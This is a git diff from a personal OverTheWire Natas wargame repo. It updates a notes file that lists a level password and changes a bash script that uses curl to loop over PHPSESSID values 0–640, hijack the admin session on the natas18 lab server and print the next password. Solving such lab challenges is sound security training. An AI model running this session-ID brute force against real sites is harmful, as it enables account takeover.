diff --git a/overthewire/natas/passwords.md b/overthewire/natas/passwords.md
index c3cd1ec..b958a6e 100644
--- a/overthewire/natas/passwords.md
+++ b/overthewire/natas/passwords.md
@@ -72,7 +72,6 @@ natas18: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
 	Another oracle attack using an SQL injection AND this time
 	using a timing based attack.
 	NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]]
-	
 natas19:
 natas20:
 
diff --git a/overthewire/natas/scripts/natas18.sh b/overthewire/natas/scripts/natas18.sh
index 0a6f2aa..7b9c2d6 100755
--- a/overthewire/natas/scripts/natas18.sh
+++ b/overthewire/natas/scripts/natas18.sh
@@ -6,7 +6,7 @@ USERNAME="admin"
 PASSWORD="arbitrary"
 
 req() {
-  local SESSION_ID=$1
+  SESSION_ID=$1
   curl http://natas18.natas.labs.overthewire.org/index.php \
        -X POST \
        -u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
@@ -14,13 +14,19 @@ req() {
        -d "password=$PASSWORD" \
        --cookie "PHPSESSID=$SESSION_ID" \
        -sS \
-    | grep "regular user" &>/dev/null
+    | grep "Password: "
 }
 
 MIN_ID=0
 MAX_ID=640
 for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
-    printf "Attempt: %2d" $i
-    req "$i" && echo -en '\r' || $(echo " [admin]"; break)
-    
+  printf "Attempt: %2d" $i
+  OUT=$(req "$i")
+  if [ $? -ne 0 ]; then
+    echo -en '\r'
+  else
+    echo " [admin]"
+    echo $OUT | awk '{print substr($2,1,32)}'
+    break
+  fi
 done